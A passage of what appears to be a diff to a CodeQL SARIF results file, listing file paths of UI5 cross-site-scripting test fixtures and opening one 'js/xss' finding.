"%SRCROOT%", + "index" : 257 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + 
}, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" 
: 301 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } 
+ }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + }, { + 
"location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + 
"uriBaseId" : "%SRCROOT%", + "index" : 370 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + 
"uriBaseId" : "%SRCROOT%", + "index" : 382 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + }, { + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + }, { + "location" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + }, { + "location" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } ], + "results" : [ { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
